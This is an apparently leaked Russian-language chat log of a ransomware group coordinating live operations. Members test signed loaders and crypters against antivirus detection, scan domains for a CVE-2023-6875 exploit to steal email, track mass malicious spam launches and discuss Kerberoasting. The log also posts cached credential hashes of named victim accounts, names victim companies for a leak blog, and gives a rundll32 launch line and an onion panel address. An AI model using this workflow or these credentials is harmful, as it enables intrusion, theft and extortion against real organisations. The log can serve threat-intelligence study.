2024-02-15 12:30:44
@ssd:matrix.bestflowers247.online
ponal
2024-02-15 12:30:46
@n3auxaxl:matrix.collectionofmanager.space
и то вряд ли
2024-02-15 12:31:03
@ssd:matrix.bestflowers247.online
поставь мне задачу что нужно
2024-02-15 12:31:15
@n3auxaxl:matrix.collectionofmanager.space
вот то что он писал по поводу exe там софта
2024-02-15 12:31:16
@ssd:matrix.bestflowers247.online
буду искать
2024-02-15 12:31:24
@n3auxaxl:matrix.collectionofmanager.space
узнай у макара чем он подписывает файл
2024-02-15 12:31:25
@n3auxaxl:matrix.collectionofmanager.space
какие серты
2024-02-15 12:31:32
@n3auxaxl:matrix.collectionofmanager.space
может те SSl.com
2024-02-15 12:31:38
@n3auxaxl:matrix.collectionofmanager.space
не подоходят нам
2024-02-15 12:31:43
@n3auxaxl:matrix.collectionofmanager.space
может их тупо детектят
2024-02-15 12:31:44
@n3auxaxl:matrix.collectionofmanager.space
а не наш софт
2024-02-15 12:31:48
@ssd:matrix.bestflowers247.online
shas sproshu
2024-02-15 12:31:56
@n3auxaxl:matrix.collectionofmanager.space
давай
2024-02-15 12:32:07
@ssd:matrix.bestflowers247.online
pram pishi mne shto nado i budu iskat uznavat
2024-02-15 12:32:08
@n3auxaxl:matrix.collectionofmanager.space
просто как файл защитить я знаю
2024-02-15 12:32:16
@ssd:matrix.bestflowers247.online
stoti vse
2024-02-15 12:32:19
@ssd:matrix.bestflowers247.online
ujas
2024-02-15 12:32:21
@ssd:matrix.bestflowers247.online
bez raboti
2024-02-15 12:32:22
@ssd:matrix.bestflowers247.online
sidim
2024-02-15 12:32:27
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-15 12:32:54
@ssd:matrix.bestflowers247.online
ewe vopros
2024-02-15 12:33:12
@ssd:matrix.bestflowers247.online
палится АВ или на этапе хрома у тебя детект?
2024-02-15 12:35:44
@ssd:matrix.bestflowers247.online
на сколько я помню надо греить серт скачками
2024-02-15 12:36:00
@ssd:matrix.bestflowers247.online
1k
2024-02-15 12:37:28
Black Basta
я тут
2024-02-15 12:37:34
Black Basta
у меня с интрнетом что то происходит
2024-02-15 12:37:37
Black Basta
я еще в дороге
2024-02-15 12:37:41
Black Basta
скоро вылечу опять
2024-02-15 12:39:11
@ssd:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> может их тупо детектят
2024-02-15 12:41:40
Black Basta
drs.7z
2024-02-15 12:41:46
Black Basta
от бурито длл
2024-02-15 12:41:55
Black Basta
почему
2024-02-15 12:42:12
Black Basta
он такой же как трендмикро
2024-02-15 12:42:14
@lapa:matrix.bestflowers247.online
+
2024-02-15 12:42:28
@burito:matrix.bestflowers247.online
обновлю и делаю
2024-02-15 12:42:33
@ssd:matrix.bestflowers247.online
Loader ZIP EXE+EV VALID CERTIFICATE
2024-02-15 12:43:01
@ssd:matrix.bestflowers247.online
2024-02-15 12:43:16
Black Basta
сейчас
2024-02-15 12:43:25
@ssd:matrix.bestflowers247.online
Если сертификат отзывают и файл перестаёт быть доверенным возвращаю оставшуюся не использованную стоимость подписки из расчёта 70$/сутки из оплаченной оставшейся недели. Цена недели 490$/7дней, жил файл 3 дня, остаток к возврату 280$( 490-210=280), сутки закрываются после первых 15 часов текущего дня ☘️
2024-02-15 12:43:39
@ssd:matrix.bestflowers247.online
tg для новостей https://t.me/+8tKyMsrhyJY0MWEy https://t.me/Crypt4U_bot
2024-02-15 12:43:46
@ssd:matrix.bestflowers247.online
Pogovori s nim
2024-02-15 12:44:01
@n3auxaxl:matrix.collectionofmanager.space
лапа уже все дал
2024-02-15 12:44:22
@u123:matrix.bestflowers247.online
ты собириаешься делать?
2024-02-15 12:46:08
Black Basta
отлично
2024-02-15 12:46:10
Black Basta
ну что работает ?
2024-02-15 12:46:22
@n3auxaxl:matrix.collectionofmanager.space
щас я сделаю тесты
2024-02-15 12:46:26
@n3auxaxl:matrix.collectionofmanager.space
скажу
2024-02-15 12:46:32
@n3auxaxl:matrix.collectionofmanager.space
отдебажу сам скрипт
2024-02-15 12:46:33
@lapa:matrix.bestflowers247.online
сигны для разменожения старые?
2024-02-15 12:46:34
@n3auxaxl:matrix.collectionofmanager.space
чтобы пасс ресетился
2024-02-15 12:46:39
@n3auxaxl:matrix.collectionofmanager.space
и выдавал то что нужно
2024-02-15 12:47:49
Black Basta
I have the exploit. The targets you should find based on the CVE. Also for Core Impact I think you should give the targets by IP addresses.
2024-02-15 12:47:56
@lapa:matrix.bestflowers247.online
hjvhjvhjvhjhjvvhjvhjvhjvjgvvggvhj не подходит
2024-02-15 12:48:20
Black Basta
> <@burito:matrix.bestflowers247.online> sent a file.
2024-02-15 12:48:24
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> I have the exploit. The targets you should find based on the CVE. Also for Core Impact I think you should give the targets by IP addresses.
2024-02-15 12:48:41
@lapa:matrix.bestflowers247.online
я пока только нашел 3 домена
2024-02-15 12:48:53
@lapa:matrix.bestflowers247.online
для которых работает https://github.com/UlyssesSaicha/CVE-2023-6875
2024-02-15 12:49:01
@lapa:matrix.bestflowers247.online
через него можно будет выкачать письма хотябы
2024-02-15 12:49:12
@lapa:matrix.bestflowers247.online
могли бы короч у него не покупать этот эксплоит_)
2024-02-15 12:49:33
Black Basta
?
2024-02-15 12:49:38
@lapa:matrix.bestflowers247.online
# Author:
2024-02-15 12:49:46
@lapa:matrix.bestflowers247.online
вот в покупном что написано
2024-02-15 12:49:47
@burito:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> сигна какая ?
2024-02-15 12:49:56
@lapa:matrix.bestflowers247.online
Ulysses Saicha это https://github.com/UlyssesSaicha/CVE-2023-6875 его репозеторий
2024-02-15 12:49:56
@muaddib6:matrix.org
> <@n3auxaxl:matrix.collectionofmanager.space> sent a file.
2024-02-15 12:50:03
@ssd:matrix.bestflowers247.online
https://forum.exploit.in/topic/156511/?tab=comments#comment-1450566
2024-02-15 12:50:06
@muaddib6:matrix.org
3.7z
2024-02-15 12:50:10
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-15 12:50:13
@muaddib6:matrix.org
+
2024-02-15 12:50:13
Black Basta
dfhfghjhdfgnggnfgrghgghhghnggnhf
2024-02-15 12:50:16
@lapa:matrix.bestflowers247.online
я через час поеду
2024-02-15 12:50:17
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-15 12:50:21
@lapa:matrix.bestflowers247.online
эксели сделали?
2024-02-15 12:50:40
@ssd:matrix.bestflowers247.online
> <@ssd:matrix.bestflowers247.online> https://forum.exploit.in/topic/156511/?tab=comments#comment-1450566
2024-02-15 12:51:09
@ssd:matrix.bestflowers247.online
там много таких как ты
2024-02-15 12:51:12
Black Basta
```
2024-02-15 12:51:55
@ssd:matrix.bestflowers247.online
с разными скиллами
2024-02-15 12:52:29
@lapa:matrix.bestflowers247.online
Error: key status is disabled
2024-02-15 12:52:33
@lapa:matrix.bestflowers247.online
отрубили серт вчерашний
2024-02-15 12:52:46
@n3auxaxl:matrix.collectionofmanager.space
чисто, все запустилось
2024-02-15 12:52:49
@n3auxaxl:matrix.collectionofmanager.space
щас скажу про стук
2024-02-15 12:53:09
@muaddib6:matrix.org
+
2024-02-15 12:53:29
@n3auxaxl:matrix.collectionofmanager.space
все окей
2024-02-15 12:53:30
@n3auxaxl:matrix.collectionofmanager.space
стучит
2024-02-15 12:53:37
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ```
2024-02-15 12:54:07
@muaddib6:matrix.org
wNyaNTmziRahuqTIJucHsqTCukmQDZgPyOeDuPfjemGAUdJNJt
2024-02-15 12:54:09
@n3auxaxl:matrix.collectionofmanager.space
> <@muaddib6:matrix.org> sent a file.
2024-02-15 12:54:11
@muaddib6:matrix.org
uel
2024-02-15 12:54:13
@u123:matrix.bestflowers247.online
* сегодня хотябы сделаешь? неужели это так сложно?
2024-02-15 12:54:14
@n3auxaxl:matrix.collectionofmanager.space
++++
2024-02-15 12:54:20
@muaddib6:matrix.org
Хорошо
2024-02-15 12:54:23
Black Basta
> <@lapa:matrix.bestflowers247.online> отрубили серт вчерашний
2024-02-15 12:54:55
Black Basta
хорошо.
2024-02-15 12:55:17
@lapa:matrix.bestflowers247.online
скоро посмотрю
2024-02-15 12:55:24
Black Basta
да не сложно
2024-02-15 12:55:27
Black Basta
отвлекают
2024-02-15 12:55:32
Black Basta
там админка долго грузит
2024-02-15 12:56:05
@u123:matrix.bestflowers247.online
понял, ну сделай плиз, а то как то неудобно перед поставщиком. Все обещаю скоро скоро, а потом оправдываться приходиться
2024-02-15 12:56:27
@lapa:matrix.bestflowers247.online
есть один
2024-02-15 12:56:46
Black Basta
++
2024-02-15 12:57:28
@usernamemm:matrix.bestflowers247.online
`$DCC2$10240#hdewar#3b90f623cba65b93740cc80643caa116`
2024-02-15 12:58:01
@u123:matrix.bestflowers247.online
* понял, ну сделай плиз, а то как то неудобно перед поставщиком. Все обещаю скоро скоро, а потом оправдываться приходится
2024-02-15 12:58:24
@muaddib6:matrix.org
> <@usernameww:matrix.bestflowers247.online> sent a file.
2024-02-15 13:01:01
@muaddib6:matrix.org
4.7z
2024-02-15 13:01:08
@usernameww:matrix.bestflowers247.online
++
2024-02-15 13:01:33
@lapa:matrix.bestflowers247.online
вроде чисто по экселю
2024-02-15 13:01:37
@lapa:matrix.bestflowers247.online
скоро европу запускать буду
2024-02-15 13:02:11
@ssd:matrix.bestflowers247.online
tak ewe moment
2024-02-15 13:02:13
@ssd:matrix.bestflowers247.online
@TrueCryptsSupport
2024-02-15 13:02:37
@ssd:matrix.bestflowers247.online
eto criptor normalniy y nego mojno sprosit kak bit v takih slcuahyh kak u nas
2024-02-15 13:02:54
@ssd:matrix.bestflowers247.online
dat emu tam na pivo
2024-02-15 13:03:53
@lapa:matrix.bestflowers247.online
запустил европу
2024-02-15 13:06:55
@n3auxaxl:matrix.collectionofmanager.space
так я щас перепишгу этот python скрипт полностью
2024-02-15 13:07:04
@n3auxaxl:matrix.collectionofmanager.space
потому что этот работает только с этим софтом
2024-02-15 13:07:14
@n3auxaxl:matrix.collectionofmanager.space
я сделаю так, чтобы он просто запускался 1 командой
2024-02-15 13:09:47
Black Basta
++
2024-02-15 13:09:51
Black Basta
запустил европу
2024-02-15 13:09:56
Black Basta
чекайе пику
2024-02-15 13:10:03
@usernameww:matrix.bestflowers247.online
++
2024-02-15 13:10:07
Black Basta
ща проверим что придет
2024-02-15 13:10:20
Black Basta
```
2024-02-15 13:10:55
Black Basta
есть запуски ?
2024-02-15 13:11:05
@usernamess:matrix.bestflowers247.online
> <@burito:matrix.bestflowers247.online> нод там есть?
2024-02-15 13:12:03
@lapa:matrix.bestflowers247.online
два запуска из франции
2024-02-15 13:12:36
@lapa:matrix.bestflowers247.online
25к уже ушло
2024-02-15 13:13:55
Black Basta
PACIFICAGROUP - добавил
2024-02-15 13:14:14
Black Basta
я сейчас в офф уйду
2024-02-15 13:14:21
Black Basta
пускай шлеться
2024-02-15 13:14:26
Black Basta
ты на сколько уйдешь в офф ?
2024-02-15 13:14:34
Black Basta
я на час плюс минус
2024-02-15 13:15:07
@lapa:matrix.bestflowers247.online
ну через час
2024-02-15 13:15:12
@lapa:matrix.bestflowers247.online
пойду собираться
2024-02-15 13:15:33
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ты на сколько уйдешь в офф ?
2024-02-15 13:16:47
@lapa:matrix.bestflowers247.online
5 запусков есть
2024-02-15 13:18:44
Black Basta
Снимок экрана 2024-02-15 в 05.18.34.png
2024-02-15 13:18:51
Black Basta
не вижу подписей
2024-02-15 13:18:53
Black Basta
запуски пошли
2024-02-15 13:21:18
Black Basta
шлем до талого
2024-02-15 13:21:29
Black Basta
ок?
2024-02-15 13:21:54
@lapa:matrix.bestflowers247.online
ок
2024-02-15 13:21:58
@lapa:matrix.bestflowers247.online
72к ушло
2024-02-15 13:22:07
@lapa:matrix.bestflowers247.online
8 запусков
2024-02-15 13:22:40
@lapa:matrix.bestflowers247.online
эксель все равно этот не оч
2024-02-15 13:22:43
@lapa:matrix.bestflowers247.online
с него не сыпет
2024-02-15 13:23:17
@lapa:matrix.bestflowers247.online
еще 30 мин буду слать
2024-02-15 13:30:54
Black Basta
++
2024-02-15 13:32:00
Black Basta
Снимок экрана 2024-02-15 в 05.31.39.png
2024-02-15 13:37:07
@usernamenn:matrix.bestflowers247.online
Привет
2024-02-15 13:37:13
Black Basta
да
2024-02-15 13:37:14
Black Basta
привет
2024-02-15 13:37:22
@usernamenn:matrix.bestflowers247.online
я на месте))
2024-02-15 13:37:22
Black Basta
проснулся
2024-02-15 13:37:26
Black Basta
это очень хорошо
2024-02-15 13:37:32
Black Basta
до скольки сидел ?
2024-02-15 13:37:41
@usernamenn:matrix.bestflowers247.online
до 5 сидели с SS
2024-02-15 13:38:00
Black Basta
ты тоже вискарика нактил ?
2024-02-15 13:38:07
Black Basta
* ты тоже вискарика накатил ?
2024-02-15 13:38:08
@usernamenn:matrix.bestflowers247.online
не
2024-02-15 13:38:16
Black Basta
тебе может разливного следующий раз привести ?)
2024-02-15 13:38:18
@usernamenn:matrix.bestflowers247.online
я не пьющий)
2024-02-15 13:38:23
@usernamenn:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> тебе может разливного следующий раз привести ?)
2024-02-15 13:38:26
@usernamenn:matrix.bestflowers247.online
не фильтрованного
2024-02-15 13:38:32
@usernamenn:matrix.bestflowers247.online
ой
2024-02-15 13:38:35
Black Basta
> <@usernamenn:matrix.bestflowers247.online> я не пьющий)
2024-02-15 13:38:36
@usernamenn:matrix.bestflowers247.online
фильтрованного наоборот
2024-02-15 13:38:50
@usernamenn:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ага ) не убущий ) не курящий еще скажи )
2024-02-15 13:38:54
Black Basta
)))
2024-02-15 13:39:34
Black Basta
я сейчас офнусь
2024-02-15 13:39:38
Black Basta
я сейчас офнусь
2024-02-15 13:39:41
Black Basta
на час
2024-02-15 13:39:44
Black Basta
на час
2024-02-15 13:42:38
@lapa:matrix.bestflowers247.online
45 запусков есть
2024-02-15 13:45:21
@usernamenn:matrix.bestflowers247.online
Ok
2024-02-15 13:55:23
@ssd:matrix.bestflowers247.online
2024-02-15 13:55:32
@lapa:matrix.bestflowers247.online
210k+ ушло
2024-02-15 13:55:37
@lapa:matrix.bestflowers247.online
стопнул
2024-02-15 13:56:34
@usernamemm:matrix.bestflowers247.online
`$DCC2$10240#admin_cbarnett#566f3bb4720250a33e68e0315d226087`
2024-02-15 13:56:42
@usernamemm:matrix.bestflowers247.online
`$DCC2$10240#CbarnettAdmin#5921081abfed18023f15168b3f5928d3`
2024-02-15 13:57:04
@muaddib6:matrix.org
> <@usernamenn:matrix.bestflowers247.online> sent a file.
2024-02-15 13:57:18
@usernamemm:matrix.bestflowers247.online
`$DCC2$10240#jmurphy#6f5966ce25a1f6608a5820a57bbec598`
2024-02-15 13:57:28
@muaddib6:matrix.org
5.7z
2024-02-15 13:57:42
@usernamenn:matrix.bestflowers247.online
> <@muaddib6:matrix.org> Еще криптом, но только длл rundll32 dll.dll,rundmsndbft
2024-02-15 14:02:11
@ssd:matrix.bestflowers247.online
> <@ssd:matrix.bestflowers247.online> tg для новостей https://t.me/+8tKyMsrhyJY0MWEy https://t.me/Crypt4U_bot
2024-02-15 14:02:40
@ssd:matrix.bestflowers247.online
Личная связь https://t.me/Mavr_MMM
2024-02-15 14:04:56
@usernamenn:matrix.bestflowers247.online
https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
2024-02-15 14:17:47
@ssd:matrix.bestflowers247.online
есть новости,списался с ним ?
2024-02-15 14:18:34
@n3auxaxl:matrix.collectionofmanager.space
погоди, я щас другим занят
2024-02-15 14:18:38
@n3auxaxl:matrix.collectionofmanager.space
мне наджо по сплойту
2024-02-15 14:18:42
@n3auxaxl:matrix.collectionofmanager.space
и реверсеры панель атакуют
2024-02-15 14:18:46
@n3auxaxl:matrix.collectionofmanager.space
очень много дел
2024-02-15 14:18:51
@n3auxaxl:matrix.collectionofmanager.space
не успеваю все вместе
2024-02-15 14:21:26
@ssd:matrix.bestflowers247.online
напиши сегодня плиз - на завтра готовить нет аки - решение тебе нашел
2024-02-15 14:22:03
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-15 14:38:43
@usernamess:matrix.bestflowers247.online
phenomenon.dll
2024-02-15 14:39:09
@usernamess:matrix.bestflowers247.online
тут просто добавление юзера
2024-02-15 14:39:23
@muaddib6:matrix.org
криптануть?
2024-02-15 14:39:27
@usernamess:matrix.bestflowers247.online
да
2024-02-15 14:39:38
@muaddib6:matrix.org
увуой запуск?
2024-02-15 14:39:42
@muaddib6:matrix.org
Какой запуск?
2024-02-15 14:40:20
@usernamenn:matrix.bestflowers247.online
у нее нет точки входа, эта длл запускает драйвер печати
2024-02-15 14:40:36
@muaddib6:matrix.org
а как запускает?
2024-02-15 14:40:58
@usernamenn:matrix.bestflowers247.online
щас гляну в исходнике экзекутора
2024-02-15 14:44:56
@usernamenn:matrix.bestflowers247.online
не понятно, не ясно нихуя
2024-02-15 14:45:39
@muaddib6:matrix.org
А как работать будите?
2024-02-15 14:48:04
@usernamenn:matrix.bestflowers247.online
в смысле как?
2024-02-15 14:48:28
@muaddib6:matrix.org
Я просто не сделаю без точки входа
2024-02-15 14:50:57
@usernamenn:matrix.bestflowers247.online
DllMain
2024-02-15 14:51:57
@u123:matrix.bestflowers247.online
ну че там с учеткой?
2024-02-15 14:52:08
@u123:matrix.bestflowers247.online
к нам в учетку билды добавил?
2024-02-15 14:52:12
@muaddib6:matrix.org
++
2024-02-15 15:18:10
@tinker:matrix.bestflowers247.online
привет, по цене реши ты плз
2024-02-15 15:21:00
@usernameugway:matrix.bestflowers247.online
бро привет, по нагрузке нет новинок? эксель и тп
2024-02-15 15:22:38
@usernameugway:matrix.bestflowers247.online
----
2024-02-15 15:22:38
@usernameugway:matrix.bestflowers247.online
https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html
2024-02-15 15:27:03
@usernamemm:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> `$DCC2$10240#admin_cbarnett#566f3bb4720250a33e68e0315d226087`
2024-02-15 15:52:53
Black Basta
добавлю
2024-02-15 15:52:56
Black Basta
еще не заходил
2024-02-15 15:53:04
Black Basta
ща
2024-02-15 16:05:04
@usernamecc:matrix.bestflowers247.online
++ ага видел уже доделываю по ней блг! что то сообщение твое просмотрел (
2024-02-15 16:09:18
@muaddib6:matrix.org
> <@usernamess:matrix.bestflowers247.online> sent a file.
2024-02-15 16:28:15
@usernamecc:matrix.bestflowers247.online
pacifica.co.uk можно подсвечивать, приготовил блог..
2024-02-15 16:29:46
@u123:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> добавлю
2024-02-15 16:29:54
@u123:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> еще не заходил
2024-02-15 17:15:18
@timber:matrix.bestflowers247.online
привет. можно доступ к логам? юзер fraen пасс не подходит. https://ifcdbvwazrdobhen3a4h32pi4upr7bykraknz43suiun6cj3ouyzaxyd.onion/login
2024-02-15 17:16:42
Black Basta
скоро
2024-02-15 17:16:47
Black Basta
++
2024-02-15 17:16:59
@timber:matrix.bestflowers247.online
ок
2024-02-15 17:17:27
Black Basta
еще поднимай
2024-02-15 17:17:29
Black Basta
до 1кк
2024-02-15 17:18:49
@ssd:matrix.bestflowers247.online
Ты с дропера выдаешь ?
2024-02-15 17:18:55
@ssd:matrix.bestflowers247.online
> <@ssd:matrix.bestflowers247.online> Личная связь https://t.me/Mavr_MMM
2024-02-15 17:19:32
@n3auxaxl:matrix.collectionofmanager.space
> <@ssd:matrix.bestflowers247.online> Ты с дропера выдаешь ?
2024-02-15 17:19:45
@ssd:matrix.bestflowers247.online
est je droperi razlichnie
2024-02-15 17:19:56
@ssd:matrix.bestflowers247.online
ne slishal?
2024-02-15 17:20:21
@ssd:matrix.bestflowers247.online
sec
2024-02-15 17:22:48
@ssd:matrix.bestflowers247.online
Пользователь переходит по ссылке на лендинг, читает текст разводки и нажимает на кнопку скачать и если выполнил запуск дроппера, то полезная нагрузка скачается и все это зафиксируется в статистике
2024-02-15 17:31:14
@lapa:matrix.bestflowers247.online
я тут
2024-02-15 17:31:21
@lapa:matrix.bestflowers247.online
пришло что-то интересное из европы?
2024-02-15 17:34:45
@tinker:matrix.bestflowers247.online
понял!
2024-02-15 17:36:55
@lapa:matrix.bestflowers247.online
короче и мелкор говорит, что странно выполнен этот эксплоит
2024-02-15 17:37:09
Black Basta
ага
2024-02-15 17:37:14
@lapa:matrix.bestflowers247.online
> <@lapa:matrix.bestflowers247.online> для которых работает https://github.com/UlyssesSaicha/CVE-2023-6875
2024-02-15 17:37:17
Black Basta
я с ним еще нормально не разговаривал
2024-02-15 17:37:18
@lapa:matrix.bestflowers247.online
пока только 50 доменов нашел
2024-02-15 17:37:23
@lapa:matrix.bestflowers247.online
но там и есть пустые
2024-02-15 17:37:48
@lapa:matrix.bestflowers247.online
и я смотрю там много обновились
2024-02-15 17:38:00
@lapa:matrix.bestflowers247.online
версия 2.8.11 как раз эту уязвимость устраняет
2024-02-15 17:42:02
Black Basta
ты норм сгонял ?
2024-02-15 17:42:12
Black Basta
> <@lapa:matrix.bestflowers247.online> пока только 50 доменов нашел
2024-02-15 17:42:15
Black Basta
сколько потоков ?
2024-02-15 17:42:29
Black Basta
> <@lapa:matrix.bestflowers247.online> и я смотрю там много обновились
2024-02-15 17:42:37
Black Basta
экчейнжей было во много раз меньше
2024-02-15 17:42:48
Black Basta
нам главное письм а выкачать
2024-02-15 17:43:44
@usernamess:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> ```
2024-02-15 17:44:40
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> ты норм сгонял ?
2024-02-15 17:44:43
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> сколько потоков ?
2024-02-15 17:44:59
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> нам главное письм а выкачать
2024-02-15 17:45:06
@lapa:matrix.bestflowers247.online
пока что чекает домены
2024-02-15 17:45:07
@lapa:matrix.bestflowers247.online
на уязвимость
2024-02-15 17:46:15
@n3auxaxl:matrix.collectionofmanager.space
кароче по поводу сплойта, это херня
2024-02-15 17:46:19
@n3auxaxl:matrix.collectionofmanager.space
орно тупо не сбрасиывается
2024-02-15 17:46:21
Black Basta
> <@lapa:matrix.bestflowers247.online> 300
2024-02-15 17:46:38
@n3auxaxl:matrix.collectionofmanager.space
я уже полностью все просмотрел, нет там такого параметра
2024-02-15 17:46:42
@burito:matrix.bestflowers247.online
> <@usernameww:matrix.bestflowers247.online> 5.file.lockers..zip
2024-02-15 17:46:42
@burito:matrix.bestflowers247.online
cr.rar
2024-02-15 17:51:00
@usernamemm:matrix.bestflowers247.online
`be88c3d53b1cc122a5c83e3c02d0c486`
2024-02-15 17:55:04
@burito:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> phenomenon.dll
2024-02-15 17:55:04
@burito:matrix.bestflowers247.online
phenomenon_cr.7z
2024-02-15 18:02:29
@u123:matrix.bestflowers247.online
как дела?
2024-02-15 18:14:10
@lapa:matrix.bestflowers247.online
офнусь. до завтра
2024-02-15 18:27:37
Black Basta
посмотмотри
2024-02-15 18:27:39
Black Basta
появились ?
2024-02-15 18:27:49
@u123:matrix.bestflowers247.online
сек
2024-02-15 18:28:29
Black Basta
dopoe234x
2024-02-15 18:29:04
Black Basta
проверит пускай
2024-02-15 18:29:17
@u123:matrix.bestflowers247.online
момент
2024-02-15 18:29:35
Black Basta
igf-inc.com
2024-02-15 18:29:46
Black Basta
| | | |-- 2019\ -\ REGULAR\ PAY\ -\ UPDATED\ TRACKER.xlsx
2024-02-15 18:29:48
Black Basta
файлы
2024-02-15 18:30:04
Black Basta
реально ?
2024-02-15 18:30:11
Black Basta
напиши по англиский текст амеру
2024-02-15 18:30:20
Black Basta
что бы я ему просто отправил он сделал возврат нам или пояснение
2024-02-15 18:30:27
Black Basta
надо ему уебать мозги
2024-02-15 18:31:15
@n3auxaxl:matrix.collectionofmanager.space
окей
2024-02-15 18:36:39
@n3auxaxl:matrix.collectionofmanager.space
1. Generation of "self.formatted_base_url" is incorrect.
2024-02-15 18:37:10
@n3auxaxl:matrix.collectionofmanager.space
Вот эти 3 пункта скинь ему
2024-02-15 18:37:19
@n3auxaxl:matrix.collectionofmanager.space
по сути почти в каждой функции херня
2024-02-15 18:38:52
@u123:matrix.bestflowers247.online
dopoe234x тут надо удалить все чаты
2024-02-15 18:39:10
@u123:matrix.bestflowers247.online
Id: a68e6f81-6afe-4c37-aa1e-e98a5234b5a
2024-02-15 18:39:36
@ssd:matrix.bestflowers247.online
https://youtu.be/YpEs2iWD8Y4 нашел чела у него куча крутых доставок по спаму тебе очень пригодится
2024-02-15 18:39:37
@u123:matrix.bestflowers247.online
а основном акке все норм
2024-02-15 18:40:04
@ssd:matrix.bestflowers247.online
нашел чела у него куча крутых доставок тебе очень пригодится
2024-02-15 18:40:52
Black Basta
> <@usernamess:matrix.bestflowers247.online> варота
2024-02-15 18:40:59
Black Basta
СС позовите
2024-02-15 18:41:00
@cob_crypt_ward:matrix.bestflowers247.online
Привет, сколько у вас сейчас детектов ан билдах если не секрет?
2024-02-15 18:41:00
@ssd:matrix.bestflowers247.online
https://youtu.be/YpEs2iWD8Y4
2024-02-15 18:41:09
@usernamecc:matrix.bestflowers247.online
я тут
2024-02-15 18:41:11
Black Basta
ага
2024-02-15 18:41:12
@usernamecc:matrix.bestflowers247.online
ищу файлы
2024-02-15 18:41:12
Black Basta
вижу
2024-02-15 18:41:43
@ssd:matrix.bestflowers247.online
у него куча крутых доставок на канеале
2024-02-15 18:42:06
Black Basta
patriziapepe.com
2024-02-15 18:42:12
Black Basta
tree file сделай по ним
2024-02-15 18:42:22
@usernamett:matrix.bestflowers247.online
были мелкие очень
2024-02-15 18:42:26
@usernamecc:matrix.bestflowers247.online
ага пять мин
2024-02-15 18:42:33
@usernamecc:matrix.bestflowers247.online
файлы найду залью и потом трее скину
2024-02-15 18:46:02
Black Basta
++
2024-02-15 18:48:32
@usernamecc:matrix.bestflowers247.online
```
2024-02-15 18:49:35
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-15 18:49:46
@n3auxaxl:matrix.collectionofmanager.space
гялну чутка позже, апдейты по блоку реверса делаю
2024-02-15 18:53:12
@usernamecc:matrix.bestflowers247.online
```
2024-02-15 18:54:41
Black Basta
привет
2024-02-15 18:54:44
Black Basta
я не проверял
2024-02-15 18:54:47
Black Basta
это бесполезно
2024-02-15 18:55:00
@cob_crypt_ward:matrix.bestflowers247.online
а на таргетах детекты были?
2024-02-15 18:55:06
Black Basta
может проще сделать ему другой акк ?
2024-02-15 18:55:44
@u123:matrix.bestflowers247.online
давай да
2024-02-15 18:55:55
@u123:matrix.bestflowers247.online
сделай как тебе удобнее
2024-02-15 18:59:41
Black Basta
dopoe2
2024-02-15 18:59:43
Black Basta
вот
2024-02-15 19:00:59
@ssd:matrix.bestflowers247.online
> <@ssd:matrix.bestflowers247.online> напиши сегодня плиз - на завтра готовить нет аки - решение тебе нашел
2024-02-15 19:01:20
@u123:matrix.bestflowers247.online
сек чекну
2024-02-15 19:02:07
Black Basta
++
2024-02-15 19:02:23
@u123:matrix.bestflowers247.online
в этой учетке только Блог вкладка
2024-02-15 19:02:29
@u123:matrix.bestflowers247.online
вкладки чатов нет
2024-02-15 19:03:02
Black Basta
все добавил
2024-02-15 19:03:05
Black Basta
и тебе и ему
2024-02-15 19:03:07
Black Basta
проверяй
2024-02-15 19:03:09
Black Basta
Id: a68e6f81-6afe-4c37-aa1e-e98a5234b5a
2024-02-15 19:03:31
Black Basta
принял
2024-02-15 19:03:35
Black Basta
ну пришли
2024-02-15 19:03:46
@u123:matrix.bestflowers247.online
сейчас
2024-02-15 19:03:53
@usernamecc:matrix.bestflowers247.online
pacifica.co.uk - подсвети, не забудь.. как будет время
2024-02-15 19:07:42
@u123:matrix.bestflowers247.online
также
2024-02-15 19:08:07
Black Basta
pacifica.co.uk - домен поменяю сейчсас
2024-02-15 19:08:48
@u123:matrix.bestflowers247.online
только вкладка блог
2024-02-15 19:08:55
@u123:matrix.bestflowers247.online
и она пустая
2024-02-15 19:10:14
@usernamecc:matrix.bestflowers247.online
короче да там была проблема с сайтом. как будто у них две похожие фирмы либо одна дочка другой. два сайта один pacificagroup.co.uk - но он не наботает. я в доках нашел адрес их фирмы и по зуму и гуглу это вот эта контора -> pacifica.co.uk
2024-02-15 19:10:55
@usernamecc:matrix.bestflowers247.online
поменял в листе
2024-02-15 19:14:01
@usernamecc:matrix.bestflowers247.online
да это одна контора. у них даже здание одно и то же на фотках.. pacificagroup.co.uk и pacifica.co.uk - адрес один сайты разные. один из них не работает только
2024-02-15 19:14:19
@usernamenn:matrix.bestflowers247.online
GetUserSPNs
2024-02-15 19:19:20
@u123:matrix.bestflowers247.online
все также
2024-02-15 19:27:36
@usernamemm:matrix.bestflowers247.online
`$DCC2$10240#admin_jaughenbaugh#afd2d90b42b94e442b663fa3524e9dfa`
2024-02-15 19:31:21
@n3auxaxl:matrix.collectionofmanager.space
пнд
2024-02-15 19:31:42
@n3auxaxl:matrix.collectionofmanager.space
может завтра, но лучше не спешить, ибо вряд ли успею
2024-02-15 19:31:48
@n3auxaxl:matrix.collectionofmanager.space
щас с реверсарми разбюерусь
